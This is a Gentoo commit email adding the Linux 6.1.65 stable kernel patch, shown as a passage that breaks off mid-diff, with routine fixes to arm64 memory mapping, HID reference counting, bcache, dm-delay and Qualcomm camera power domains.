Subject: [gentoo-commits] proj/linux-patches:6.1 commit in: /
From:    Mike Pagano @ 2023-12-03 11:16 UTC
To:      gentoo-commits

commit:     60297308479e47932e515186d086233dc4aefa39
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Dec  3 11:16:03 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Dec  3 11:16:03 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=60297308

Linux patch 6.1.65

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1064_linux-6.1.65.patch | 4244 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4248 insertions(+)

diff --git a/0000_README b/0000_README
index 8892941f..08e6f2e1 100644
--- a/0000_README
+++ b/0000_README
@@ -299,6 +299,10 @@ Patch:  1063_linux-6.1.64.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.64
 
+Patch:  1064_linux-6.1.65.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.65
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1064_linux-6.1.65.patch b/1064_linux-6.1.65.patch
new file mode 100644
index 00000000..70227a3a
--- /dev/null
+++ b/1064_linux-6.1.65.patch
@@ -0,0 +1,4244 @@
+diff --git a/Makefile b/Makefile
+index 97c75ae364cdf..1646e334a647f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 64
++SUBLEVEL = 65
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/xen/enlighten.c b/arch/arm/xen/enlighten.c
+index b647306eb1608..d12fdb9c05a89 100644
+--- a/arch/arm/xen/enlighten.c
++++ b/arch/arm/xen/enlighten.c
+@@ -484,7 +484,8 @@ static int __init xen_guest_init(void)
+ 	 * for secondary CPUs as they are brought up.
+ 	 * For uniformity we use VCPUOP_register_vcpu_info even on cpu0.
+ 	 */
+-	xen_vcpu_info = alloc_percpu(struct vcpu_info);
++	xen_vcpu_info = __alloc_percpu(sizeof(struct vcpu_info),
++				       1 << fls(sizeof(struct vcpu_info) - 1));
+ 	if (xen_vcpu_info == NULL)
+ 		return -ENOMEM;
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+index faafefe562e4b..d74c126d5ee07 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+@@ -27,6 +27,7 @@
+ 		regulator-name = "eth_phy_pwr";
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-max-microvolt = <3300000>;
++		regulator-enable-ramp-delay = <20000>;
+ 		gpio = <&gpio2 9 GPIO_ACTIVE_HIGH>;
+ 		enable-active-high;
+ 	};
+diff --git a/arch/arm64/include/asm/kfence.h b/arch/arm64/include/asm/kfence.h
+index aa855c6a0ae6f..a81937fae9f6d 100644
+--- a/arch/arm64/include/asm/kfence.h
++++ b/arch/arm64/include/asm/kfence.h
+@@ -19,4 +19,14 @@ static inline bool kfence_protect_page(unsigned long addr, bool protect)
+ 	return true;
+ }
+ 
++#ifdef CONFIG_KFENCE
++extern bool kfence_early_init;
++static inline bool arm64_kfence_can_set_direct_map(void)
++{
++	return !kfence_early_init;
++}
++#else /* CONFIG_KFENCE */
++static inline bool arm64_kfence_can_set_direct_map(void) { return false; }
++#endif /* CONFIG_KFENCE */
++
+ #endif /* __ASM_KFENCE_H */
+diff --git a/arch/arm64/include/asm/setup.h b/arch/arm64/include/asm/setup.h
+index f4af547ef54ca..2e4d7da74fb87 100644
+--- a/arch/arm64/include/asm/setup.h
++++ b/arch/arm64/include/asm/setup.h
+@@ -21,9 +21,22 @@ static inline bool arch_parse_debug_rodata(char *arg)
+ 	extern bool rodata_enabled;
+ 	extern bool rodata_full;
+ 
+-	if (arg && !strcmp(arg, "full")) {
++	if (!arg)
++		return false;
++
++	if (!strcmp(arg, "full")) {
++		rodata_enabled = rodata_full = true;
++		return true;
++	}
++
++	if (!strcmp(arg, "off")) {
++		rodata_enabled = rodata_full = false;
++		return true;
++	}
++
++	if (!strcmp(arg, "on")) {
+ 		rodata_enabled = true;
+-		rodata_full = true;
++		rodata_full = false;
+ 		return true;
+ 	}
+ 
+diff --git a/arch/arm64/mm/mmu.c b/arch/arm64/mm/mmu.c
+index 9a7c389651540..4b302dbf78e96 100644
+--- a/arch/arm64/mm/mmu.c
++++ b/arch/arm64/mm/mmu.c
+@@ -24,6 +24,7 @@
+ #include <linux/mm.h>
+ #include <linux/vmalloc.h>
+ #include <linux/set_memory.h>
++#include <linux/kfence.h>
+ 
+ #include <asm/barrier.h>
+ #include <asm/cputype.h>
+@@ -38,6 +39,7 @@
+ #include <asm/ptdump.h>
+ #include <asm/tlbflush.h>
+ #include <asm/pgalloc.h>
++#include <asm/kfence.h>
+ 
+ #define NO_BLOCK_MAPPINGS	BIT(0)
+ #define NO_CONT_MAPPINGS	BIT(1)
+@@ -521,12 +523,67 @@ static int __init enable_crash_mem_map(char *arg)
+ }
+ early_param("crashkernel", enable_crash_mem_map);
+ 
++#ifdef CONFIG_KFENCE
++
++bool __ro_after_init kfence_early_init = !!CONFIG_KFENCE_SAMPLE_INTERVAL;
++
++/* early_param() will be parsed before map_mem() below. */
++static int __init parse_kfence_early_init(char *arg)
++{
++	int val;
++
++	if (get_option(&arg, &val))
++		kfence_early_init = !!val;
++	return 0;
++}
++early_param("kfence.sample_interval", parse_kfence_early_init);
++
++static phys_addr_t __init arm64_kfence_alloc_pool(void)
++{
++	phys_addr_t kfence_pool;
++
++	if (!kfence_early_init)
++		return 0;
++
++	kfence_pool = memblock_phys_alloc(KFENCE_POOL_SIZE, PAGE_SIZE);
++	if (!kfence_pool) {
++		pr_err("failed to allocate kfence pool\n");
++		kfence_early_init = false;
++		return 0;
++	}
++
++	/* Temporarily mark as NOMAP. */
++	memblock_mark_nomap(kfence_pool, KFENCE_POOL_SIZE);
++
++	return kfence_pool;
++}
++
++static void __init arm64_kfence_map_pool(phys_addr_t kfence_pool, pgd_t *pgdp)
++{
++	if (!kfence_pool)
++		return;
++
++	/* KFENCE pool needs page-level mapping. */
++	__map_memblock(pgdp, kfence_pool, kfence_pool + KFENCE_POOL_SIZE,
++			pgprot_tagged(PAGE_KERNEL),
++			NO_BLOCK_MAPPINGS | NO_CONT_MAPPINGS);
++	memblock_clear_nomap(kfence_pool, KFENCE_POOL_SIZE);
++	__kfence_pool = phys_to_virt(kfence_pool);
++}
++#else /* CONFIG_KFENCE */
++
++static inline phys_addr_t arm64_kfence_alloc_pool(void) { return 0; }
++static inline void arm64_kfence_map_pool(phys_addr_t kfence_pool, pgd_t *pgdp) { }
++
++#endif /* CONFIG_KFENCE */
++
+ static void __init map_mem(pgd_t *pgdp)
+ {
+ 	static const u64 direct_map_end = _PAGE_END(VA_BITS_MIN);
+ 	phys_addr_t kernel_start = __pa_symbol(_stext);
+ 	phys_addr_t kernel_end = __pa_symbol(__init_begin);
+ 	phys_addr_t start, end;
++	phys_addr_t early_kfence_pool;
+ 	int flags = NO_EXEC_MAPPINGS;
+ 	u64 i;
+ 
+@@ -539,6 +596,8 @@ static void __init map_mem(pgd_t *pgdp)
+ 	 */
+ 	BUILD_BUG_ON(pgd_index(direct_map_end - 1) == pgd_index(direct_map_end));
+ 
++	early_kfence_pool = arm64_kfence_alloc_pool();
++
+ 	if (can_set_direct_map())
+ 		flags |= NO_BLOCK_MAPPINGS | NO_CONT_MAPPINGS;
+ 
+@@ -604,6 +663,8 @@ static void __init map_mem(pgd_t *pgdp)
+ 		}
+ 	}
+ #endif
++
++	arm64_kfence_map_pool(early_kfence_pool, pgdp);
+ }
+ 
+ void mark_rodata_ro(void)
+diff --git a/arch/arm64/mm/pageattr.c b/arch/arm64/mm/pageattr.c
+index 5922178d7a064..826cb200b204f 100644
+--- a/arch/arm64/mm/pageattr.c
++++ b/arch/arm64/mm/pageattr.c
+@@ -11,6 +11,7 @@
+ #include <asm/cacheflush.h>
+ #include <asm/set_memory.h>
+ #include <asm/tlbflush.h>
++#include <asm/kfence.h>
+ 
+ struct page_change_data {
+ 	pgprot_t set_mask;
+@@ -22,12 +23,14 @@ bool rodata_full __ro_after_init = IS_ENABLED(CONFIG_RODATA_FULL_DEFAULT_ENABLED
+ bool can_set_direct_map(void)
+ {
+ 	/*
+-	 * rodata_full, DEBUG_PAGEALLOC and KFENCE require linear map to be
++	 * rodata_full and DEBUG_PAGEALLOC require linear map to be
+ 	 * mapped at page granularity, so that it is possible to
+ 	 * protect/unprotect single pages.
++	 *
++	 * KFENCE pool requires page-granular mapping if initialized late.
+ 	 */
+-	return (rodata_enabled && rodata_full) || debug_pagealloc_enabled() ||
+-		IS_ENABLED(CONFIG_KFENCE);
++	return rodata_full || debug_pagealloc_enabled() ||
++	       arm64_kfence_can_set_direct_map();
+ }
+ 
+ static int change_page_range(pte_t *ptep, unsigned long addr, void *data)
+@@ -102,8 +105,7 @@ static int change_memory_common(unsigned long addr, int numpages,
+ 	 * If we are manipulating read-only permissions, apply the same
+ 	 * change to the linear mapping of the pages that back this VM area.
+ 	 */
+-	if (rodata_enabled &&
+-	    rodata_full && (pgprot_val(set_mask) == PTE_RDONLY ||
++	if (rodata_full && (pgprot_val(set_mask) == PTE_RDONLY ||
+ 			    pgprot_val(clear_mask) == PTE_RDONLY)) {
+ 		for (i = 0; i < area->nr_pages; i++) {
+ 			__change_memory_common((u64)page_address(area->pages[i]),
+diff --git a/arch/mips/kvm/mmu.c b/arch/mips/kvm/mmu.c
+index 74cd64a24d059..19ec27be20f06 100644
+--- a/arch/mips/kvm/mmu.c
++++ b/arch/mips/kvm/mmu.c
+@@ -593,7 +593,7 @@ static int kvm_mips_map_page(struct kvm_vcpu *vcpu, unsigned long gpa,
+ 	gfn_t gfn = gpa >> PAGE_SHIFT;
+ 	int srcu_idx, err;
+ 	kvm_pfn_t pfn;
+-	pte_t *ptep, entry, old_pte;
++	pte_t *ptep, entry;
+ 	bool writeable;
+ 	unsigned long prot_bits;
+ 	unsigned long mmu_seq;
+@@ -665,7 +665,6 @@ retry:
+ 	entry = pfn_pte(pfn, __pgprot(prot_bits));
+ 
+ 	/* Write the PTE */
+-	old_pte = *ptep;
+ 	set_pte(ptep, entry);
+ 
+ 	err = 0;
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 99bab31919e4c..c297e40c5bdc0 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -446,6 +446,13 @@ static const struct dmi_system_id asus_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "B1402CBA"),
+ 		},
+ 	},
++	{
++		/* Asus ExpertBook B1402CVA */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_BOARD_NAME, "B1402CVA"),
++		},
++	},
+ 	{
+ 		.ident = "Asus ExpertBook B2402CBA",
+ 		.matches = {
+diff --git a/drivers/ata/pata_isapnp.c b/drivers/ata/pata_isapnp.c
+index 43bb224430d3c..8892931ea8676 100644
+--- a/drivers/ata/pata_isapnp.c
++++ b/drivers/ata/pata_isapnp.c
+@@ -82,6 +82,9 @@ static int isapnp_init_one(struct pnp_dev *idev, const struct pnp_device_id *dev
+ 	if (pnp_port_valid(idev, 1)) {
+ 		ctl_addr = devm_ioport_map(&idev->dev,
+ 					   pnp_port_start(idev, 1), 1);
++		if (!ctl_addr)
++			return -ENOMEM;
++
+ 		ap->ioaddr.altstatus_addr = ctl_addr;
+ 		ap->ioaddr.ctl_addr = ctl_addr;
+ 		ap->ops = &isapnp_port_ops;
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt.c b/drivers/gpu/drm/i915/gt/intel_gt.c
+index d12ec092e62df..91a005c46b107 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt.c
+@@ -903,8 +903,6 @@ int intel_gt_probe_all(struct drm_i915_private *i915)
+ 
+ err:
+ 	i915_probe_error(i915, "Failed to initialize %s! (%d)\n", gtdef->name, ret);
+-	intel_gt_release_all(i915);
+-
+ 	return ret;
+ }
+ 
+@@ -923,15 +921,6 @@ int intel_gt_tiles_init(struct drm_i915_private *i915)
+ 	return 0;
+ }
+ 
+-void intel_gt_release_all(struct drm_i915_private *i915)
+-{
+-	struct intel_gt *gt;
+-	unsigned int id;
+-
+-	for_each_gt(gt, i915, id)
+-		i915->gt[id] = NULL;
+-}
+-
+ void intel_gt_info_print(const struct intel_gt_info *info,
+ 			 struct drm_printer *p)
+ {
+diff --git a/drivers/gpu/drm/i915/i915_driver.c b/drivers/gpu/drm/i915/i915_driver.c
+index 75a93951fe429..be0ebed2a360f 100644
+--- a/drivers/gpu/drm/i915/i915_driver.c
++++ b/drivers/gpu/drm/i915/i915_driver.c
+@@ -901,7 +901,7 @@ int i915_driver_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	ret = i915_driver_mmio_probe(i915);
+ 	if (ret < 0)
+-		goto out_tiles_cleanup;
++		goto out_runtime_pm_put;
+ 
+ 	ret = i915_driver_hw_probe(i915);
+ 	if (ret < 0)
+@@ -959,8 +959,6 @@ out_cleanup_hw:
+ 	i915_ggtt_driver_late_release(i915);
+ out_cleanup_mmio:
+ 	i915_driver_mmio_release(i915);
+-out_tiles_cleanup:
+-	intel_gt_release_all(i915);
+ out_runtime_pm_put:
+ 	enable_rpm_wakeref_asserts(&i915->runtime_pm);
+ 	i915_driver_late_release(i915);
+diff --git a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+index c924f1124ebca..1c008bd9102ff 100644
+--- a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
++++ b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+@@ -36,6 +36,7 @@ struct panel_desc {
+ 	const struct panel_init_cmd *init_cmds;
+ 	unsigned int lanes;
+ 	bool discharge_on_disable;
++	bool lp11_before_reset;
+ };
+ 
+ struct boe_panel {
+@@ -1269,6 +1270,10 @@ static int boe_panel_prepare(struct drm_panel *panel)
+ 
+ 	usleep_range(10000, 11000);
+ 
++	if (boe->desc->lp11_before_reset) {
++		mipi_dsi_dcs_nop(boe->dsi);
++		usleep_range(1000, 2000);
++	}
+ 	gpiod_set_value(boe->enable_gpio, 1);
+ 	usleep_range(1000, 2000);
+ 	gpiod_set_value(boe->enable_gpio, 0);
+@@ -1468,6 +1473,7 @@ static const struct panel_desc auo_b101uan08_3_desc = {
+ 	.mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_SYNC_PULSE |
+ 		      MIPI_DSI_MODE_LPM,
+ 	.init_cmds = auo_b101uan08_3_init_cmd,
++	.lp11_before_reset = true,
+ };
+ 
+ static const struct drm_display_mode boe_tv105wum_nw0_default_mode = {
+@@ -1495,6 +1501,7 @@ static const struct panel_desc boe_tv105wum_nw0_desc = {
+ 	.mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_SYNC_PULSE |
+ 		      MIPI_DSI_MODE_LPM,
+ 	.init_cmds = boe_init_cmd,
++	.lp11_before_reset = true,
+ };
+ 
+ static int boe_panel_get_modes(struct drm_panel *panel,
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 0e8622ccd3a0f..005377f58eb4a 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -2205,13 +2205,13 @@ static const struct panel_desc innolux_g070y2_t02 = {
+ static const struct display_timing innolux_g101ice_l01_timing = {
+ 	.pixelclock = { 60400000, 71100000, 74700000 },
+ 	.hactive = { 1280, 1280, 1280 },
+-	.hfront_porch = { 41, 80, 100 },
+-	.hback_porch = { 40, 79, 99 },
+-	.hsync_len = { 1, 1, 1 },
++	.hfront_porch = { 30, 60, 70 },
++	.hback_porch = { 30, 60, 70 },
++	.hsync_len = { 22, 40, 60 },
+ 	.vactive = { 800, 800, 800 },
+-	.vfront_porch = { 5, 11, 14 },
+-	.vback_porch = { 4, 11, 14 },
+-	.vsync_len = { 1, 1, 1 },
++	.vfront_porch = { 3, 8, 14 },
++	.vback_porch = { 3, 8, 14 },
++	.vsync_len = { 4, 7, 12 },
+ 	.flags = DISPLAY_FLAGS_DE_HIGH,
+ };
+ 
+@@ -2228,6 +2228,7 @@ static const struct panel_desc innolux_g101ice_l01 = {
+ 		.disable = 200,
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X7X4_SPWG,
++	.bus_flags = DRM_BUS_FLAG_DE_HIGH,
+ 	.connector_type = DRM_MODE_CONNECTOR_LVDS,
+ };
+ 
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index ae8c532f7fc84..632ab8941eb44 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -248,14 +248,22 @@ static inline void vop_cfg_done(struct vop *vop)
+ 	VOP_REG_SET(vop, common, cfg_done, 1);
+ }
+ 
+-static bool has_rb_swapped(uint32_t format)
++static bool has_rb_swapped(uint32_t version, uint32_t format)
+ {
+ 	switch (format) {
+ 	case DRM_FORMAT_XBGR8888:
+ 	case DRM_FORMAT_ABGR8888:
+-	case DRM_FORMAT_BGR888:
+ 	case DRM_FORMAT_BGR565:
+ 		return true;
++	/*
++	 * full framework (IP version 3.x) only need rb swapped for RGB888 and
++	 * little framework (IP version 2.x) only need rb swapped for BGR888,
++	 * check for 3.x to also only rb swap BGR888 for unknown vop version
++	 */
++	case DRM_FORMAT_RGB888:
++		return VOP_MAJOR(version) == 3;
++	case DRM_FORMAT_BGR888:
++		return VOP_MAJOR(version) != 3;
+ 	default:
+ 		return false;
+ 	}
+@@ -1017,7 +1025,7 @@ static void vop_plane_atomic_update(struct drm_plane *plane,
+ 	VOP_WIN_SET(vop, win, dsp_info, dsp_info);
+ 	VOP_WIN_SET(vop, win, dsp_st, dsp_st);
+ 
+-	rb_swap = has_rb_swapped(fb->format->format);
++	rb_swap = has_rb_swapped(vop->data->version, fb->format->format);
+ 	VOP_WIN_SET(vop, win, rb_swap, rb_swap);
+ 
+ 	/*
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index 799a3086dbb06..cdad3a0662876 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -707,15 +707,22 @@ static void hid_close_report(struct hid_device *device)
+  * Free a device structure, all reports, and all fields.
+  */
+ 
+-static void hid_device_release(struct device *dev)
++void hiddev_free(struct kref *ref)
+ {
+-	struct hid_device *hid = to_hid_device(dev);
++	struct hid_device *hid = container_of(ref, struct hid_device, ref);
+ 
+ 	hid_close_report(hid);
+ 	kfree(hid->dev_rdesc);
+ 	kfree(hid);
+ }
+ 
++static void hid_device_release(struct device *dev)
++{
++	struct hid_device *hid = to_hid_device(dev);
++
++	kref_put(&hid->ref, hiddev_free);
++}
++
+ /*
+  * Fetch a report description item from the data stream. We support long
+  * items, though they are not used yet.
+@@ -2813,6 +2820,7 @@ struct hid_device *hid_allocate_device(void)
+ 	spin_lock_init(&hdev->debug_list_lock);
+ 	sema_init(&hdev->driver_input_lock, 1);
+ 	mutex_init(&hdev->ll_open_lock);
++	kref_init(&hdev->ref);
+ 
+ 	return hdev;
+ }
+diff --git a/drivers/hid/hid-debug.c b/drivers/hid/hid-debug.c
+index 15e35702773cd..7f78622b1b0b3 100644
+--- a/drivers/hid/hid-debug.c
++++ b/drivers/hid/hid-debug.c
+@@ -1132,6 +1132,7 @@ static int hid_debug_events_open(struct inode *inode, struct file *file)
+ 		goto out;
+ 	}
+ 	list->hdev = (struct hid_device *) inode->i_private;
++	kref_get(&list->hdev->ref);
+ 	file->private_data = list;
+ 	mutex_init(&list->read_mutex);
+ 
+@@ -1224,6 +1225,8 @@ static int hid_debug_events_release(struct inode *inode, struct file *file)
+ 	list_del(&list->node);
+ 	spin_unlock_irqrestore(&list->hdev->debug_list_lock, flags);
+ 	kfifo_free(&list->hid_debug_fifo);
++
++	kref_put(&list->hdev->ref, hiddev_free);
+ 	kfree(list);
+ 
+ 	return 0;
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 68b9d7ca864e2..4d3595d6d1c40 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -1342,7 +1342,7 @@ static int btree_gc_coalesce(struct btree *b, struct btree_op *op,
+ 	memset(new_nodes, 0, sizeof(new_nodes));
+ 	closure_init_stack(&cl);
+ 
+-	while (nodes < GC_MERGE_NODES && !IS_ERR(r[nodes].b))
++	while (nodes < GC_MERGE_NODES && !IS_ERR_OR_NULL(r[nodes].b))
+ 		keys += r[nodes++].keys;
+ 
+ 	blocks = btree_default_blocks(b->c) * 2 / 3;
+@@ -1506,6 +1506,8 @@ static int btree_gc_rewrite_node(struct btree *b, struct btree_op *op,
+ 		return 0;
+ 
+ 	n = btree_node_alloc_replacement(replace, NULL);
++	if (IS_ERR(n))
++		return 0;
+ 
+ 	/* recheck reserve after allocating replacement node */
+ 	if (btree_check_reserve(b, NULL)) {
+diff --git a/drivers/md/bcache/sysfs.c b/drivers/md/bcache/sysfs.c
+index c6f677059214d..025fe6479bb68 100644
+--- a/drivers/md/bcache/sysfs.c
++++ b/drivers/md/bcache/sysfs.c
+@@ -1103,7 +1103,7 @@ SHOW(__bch_cache)
+ 			sum += INITIAL_PRIO - cached[i];
+ 
+ 		if (n)
+-			do_div(sum, n);
++			sum = div64_u64(sum, n);
+ 
+ 		for (i = 0; i < ARRAY_SIZE(q); i++)
+ 			q[i] = INITIAL_PRIO - cached[n * (i + 1) /
+diff --git a/drivers/md/bcache/writeback.c b/drivers/md/bcache/writeback.c
+index 7bac2a88b794a..01c7c6ca4789f 100644
+--- a/drivers/md/bcache/writeback.c
++++ b/drivers/md/bcache/writeback.c
+@@ -977,24 +977,35 @@ static int bch_btre_dirty_init_thread_nr(void)
+ void bch_sectors_dirty_init(struct bcache_device *d)
+ {
+ 	int i;
++	struct btree *b = NULL;
+ 	struct bkey *k = NULL;
+ 	struct btree_iter iter;
+ 	struct sectors_dirty_init op;
+ 	struct cache_set *c = d->c;
+ 	struct bch_dirty_init_state state;
+ 
++retry_lock:
++	b = c->root;
++	rw_lock(0, b, b->level);
++	if (b != c->root) {
++		rw_unlock(0, b);
++		goto retry_lock;
++	}
++
+ 	/* Just count root keys if no leaf node */
+-	rw_lock(0, c->root, c->root->level);
+ 	if (c->root->level == 0) {
+ 		bch_btree_op_init(&op.op, -1);
+ 		op.inode = d->id;
+ 		op.count = 0;
+ 
+ 		for_each_key_filter(&c->root->keys,
+-				    k, &iter, bch_ptr_invalid)
++				    k, &iter, bch_ptr_invalid) {
++			if (KEY_INODE(k) != op.inode)
++				continue;
+ 			sectors_dirty_init_fn(&op.op, c->root, k);
++		}
+ 
+-		rw_unlock(0, c->root);
++		rw_unlock(0, b);
+ 		return;
+ 	}
+ 
+@@ -1014,23 +1025,24 @@ void bch_sectors_dirty_init(struct bcache_device *d)
+ 		if (atomic_read(&state.enough))
+ 			break;
+ 
++		atomic_inc(&state.started);
+ 		state.infos[i].state = &state;
+ 		state.infos[i].thread =
+ 			kthread_run(bch_dirty_init_thread, &state.infos[i],
+ 				    "bch_dirtcnt[%d]", i);
+ 		if (IS_ERR(state.infos[i].thread)) {
+ 			pr_err("fails to run thread bch_dirty_init[%d]\n", i);
++			atomic_dec(&state.started);
+ 			for (--i; i >= 0; i--)
+ 				kthread_stop(state.infos[i].thread);
+ 			goto out;
+ 		}
+-		atomic_inc(&state.started);
+ 	}
+ 
+ out:
+ 	/* Must wait for all threads to stop. */
+ 	wait_event(state.wait, atomic_read(&state.started) == 0);
+-	rw_unlock(0, c->root);
++	rw_unlock(0, b);
+ }
+ 
+ void bch_cached_dev_writeback_init(struct cached_dev *dc)
+diff --git a/drivers/md/dm-delay.c b/drivers/md/dm-delay.c
+index 02b8f4e818276..43541c8e2b43d 100644
+--- a/drivers/md/dm-delay.c
++++ b/drivers/md/dm-delay.c
+@@ -30,7 +30,7 @@ struct delay_c {
+ 	struct workqueue_struct *kdelayd_wq;
+ 	struct work_struct flush_expired_bios;
+ 	struct list_head delayed_bios;
+-	atomic_t may_delay;
++	bool may_delay;
+ 
+ 	struct delay_class read;
+ 	struct delay_class write;
+@@ -191,7 +191,7 @@ static int delay_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	INIT_WORK(&dc->flush_expired_bios, flush_expired_bios);
+ 	INIT_LIST_HEAD(&dc->delayed_bios);
+ 	mutex_init(&dc->timer_lock);
+-	atomic_set(&dc->may_delay, 1);
++	dc->may_delay = true;
+ 	dc->argc = argc;
+ 
+ 	ret = delay_class_ctr(ti, &dc->read, argv);
+@@ -246,7 +246,7 @@ static int delay_bio(struct delay_c *dc, struct delay_class *c, struct bio *bio)
+ 	struct dm_delay_info *delayed;
+ 	unsigned long expires = 0;
+ 
+-	if (!c->delay || !atomic_read(&dc->may_delay))
++	if (!c->delay)
+ 		return DM_MAPIO_REMAPPED;
+ 
+ 	delayed = dm_per_bio_data(bio, sizeof(struct dm_delay_info));
+@@ -255,6 +255,10 @@ static int delay_bio(struct delay_c *dc, struct delay_class *c, struct bio *bio)
+ 	delayed->expires = expires = jiffies + msecs_to_jiffies(c->delay);
+ 
+ 	mutex_lock(&delayed_bios_lock);
++	if (unlikely(!dc->may_delay)) {
++		mutex_unlock(&delayed_bios_lock);
++		return DM_MAPIO_REMAPPED;
++	}
+ 	c->ops++;
+ 	list_add_tail(&delayed->list, &dc->delayed_bios);
+ 	mutex_unlock(&delayed_bios_lock);
+@@ -268,7 +272,10 @@ static void delay_presuspend(struct dm_target *ti)
+ {
+ 	struct delay_c *dc = ti->private;
+ 
+-	atomic_set(&dc->may_delay, 0);
++	mutex_lock(&delayed_bios_lock);
++	dc->may_delay = false;
++	mutex_unlock(&delayed_bios_lock);
++
+ 	del_timer_sync(&dc->delay_timer);
+ 	flush_bios(flush_delayed_bios(dc, 1));
+ }
+@@ -277,7 +284,7 @@ static void delay_resume(struct dm_target *ti)
+ {
+ 	struct delay_c *dc = ti->private;
+ 
+-	atomic_set(&dc->may_delay, 1);
++	dc->may_delay = true;
+ }
+ 
+ static int delay_map(struct dm_target *ti, struct bio *bio)
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index e87507d29895e..20f67edae95d0 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -8648,7 +8648,8 @@ static void md_end_io_acct(struct bio *bio)
+ 	struct md_io_acct *md_io_acct = bio->bi_private;
+ 	struct bio *orig_bio = md_io_acct->orig_bio;
+ 
+-	orig_bio->bi_status = bio->bi_status;
++	if (bio->bi_status && !orig_bio->bi_status)
++		orig_bio->bi_status = bio->bi_status;
+ 
+ 	bio_end_io_acct(orig_bio, md_io_acct->start_time);
+ 	bio_put(bio);
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe-170.c b/drivers/media/platform/qcom/camss/camss-vfe-170.c
+index 07b64d257512c..f9492b1d16e3e 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe-170.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe-170.c
+@@ -671,7 +671,12 @@ out_unlock:
+  */
+ static void vfe_pm_domain_off(struct vfe_device *vfe)
+ {
+-	/* nop */
++	struct camss *camss = vfe->camss;
++
++	if (vfe->id >= camss->vfe_num)
++		return;
++
++	device_link_del(camss->genpd_link[vfe->id]);
+ }
+ 
+ /*
+@@ -680,6 +685,19 @@ static void vfe_pm_domain_off(struct vfe_device *vfe)
+  */
+ static int vfe_pm_domain_on(struct vfe_device *vfe)
+ {
++	struct camss *camss = vfe->camss;
++	enum vfe_line_id id = vfe->id;
++
++	if (id >= camss->vfe_num)
++		return 0;
++
++	camss->genpd_link[id] = device_link_add(camss->dev, camss->genpd[id],
++						DL_FLAG_STATELESS |
++						DL_FLAG_PM_RUNTIME |
++						DL_FLAG_RPM_ACTIVE);
++	if (!camss->genpd_link[id])
++		return -EINVAL;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe-480.c b/drivers/media/platform/qcom/camss/camss-vfe-480.c
+index ab42600f7a745..72f5cfeeb49bf 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe-480.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe-480.c
+@@ -478,7 +478,12 @@ out_unlock:
+  */
+ static void vfe_pm_domain_off(struct vfe_device *vfe)
+ {
+-	/* nop */
++	struct camss *camss = vfe->camss;
++
++	if (vfe->id >= camss->vfe_num)
++		return;
++
++	device_link_del(camss->genpd_link[vfe->id]);
+ }
+ 
+ /*
+@@ -487,6 +492,19 @@ static void vfe_pm_domain_off(struct vfe_device *vfe)
+  */
+ static int vfe_pm_domain_on(struct vfe_device *vfe)
+ {
++	struct camss *camss = vfe->camss;
++	enum vfe_line_id id = vfe->id;
++
++	if (id >= camss->vfe_num)
++		return 0;
++
